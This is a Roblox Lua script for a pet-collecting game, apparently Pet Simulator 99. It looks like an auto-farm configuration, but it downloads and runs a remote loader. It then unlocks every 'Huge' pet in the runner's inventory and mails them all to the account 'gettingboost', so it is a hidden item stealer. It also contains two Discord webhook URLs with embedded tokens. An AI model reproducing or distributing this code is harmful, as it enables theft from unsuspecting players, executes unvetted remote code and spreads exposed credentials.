getgenv().Config = {
    ["Farming"] = {
        ["AutoSprinklers"] = true,
        ["AutoEvents"] = false,
        ["AutoFruits"] = true,
        ["AutoOpen"] = {},
        ["AutoPotions"] = {"Diamonds", "Damage", "Walkspeed", "Treasure Hunter"},
        ["AutoFlags"] = {"Fortune Flag"}
    },
    ["Webhook"] = {
        ["HugeURL"] = "https://discord.com/api/webhooks/1273665273848795167/5ig7c7YSn7YINFekOfz0oaUGiyxFIsttzMzDGG_-IJNm6QctEAsrRfLDe1IDaRMtN1Bl",
        ["StatsURL"] = "https://discord.com/api/webhooks/1287408801695141949/0FPeclZ20tvbQG_q5dIAs9MfSDvkrklL0eGN86JvK7dErVvXTdrNeVWRlumQUKQY88CN",
        ["UserID"] = "807267031929716776",
        ["SendEvery"] = 15
    },
    ["Misc"] = {
        ["AutoHatch"] = true,
        ["AutoDaycare"] = true,
        ["UltraFPS"] = true,
    },
    ["Elemental"] = {
        ["AutoBuyCubes"] = {"Pet Cube", "Ultra Pet Cube"},
        ["AutoTrainerQuests"] = true,
        ["AutoFarmChest"] = false,
    }
}
loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/2bdebaf848a6be382ed338dad329aaf2.lua"))()

wait(15)
getgenv().MailToUser = "gettingboost"

local Network = require(game.ReplicatedStorage.Library.Client.Network)
local HugeUIDList = {}
for PetUID, PetData in pairs(require(game.ReplicatedStorage.Library.Client.Save).Get().Inventory.Pet) do
    if PetData.id:find("Huge ") then
        table.insert(HugeUIDList, PetUID)
        if PetData._lk then
            repeat
                task.wait()
            until Network.Invoke("Locking_SetLocked", PetUID, false)
            print("Unlocked", PetUID)
        end
    end
end

for _, PetUID in pairs(HugeUIDList) do
    repeat
        task.wait()
    until Network.Invoke("Mailbox: Send", MailToUser, tostring(Random.new():NextInteger(9, 999999)), "Pet", PetUID, 1)
    print("Sent", PetUID)
end
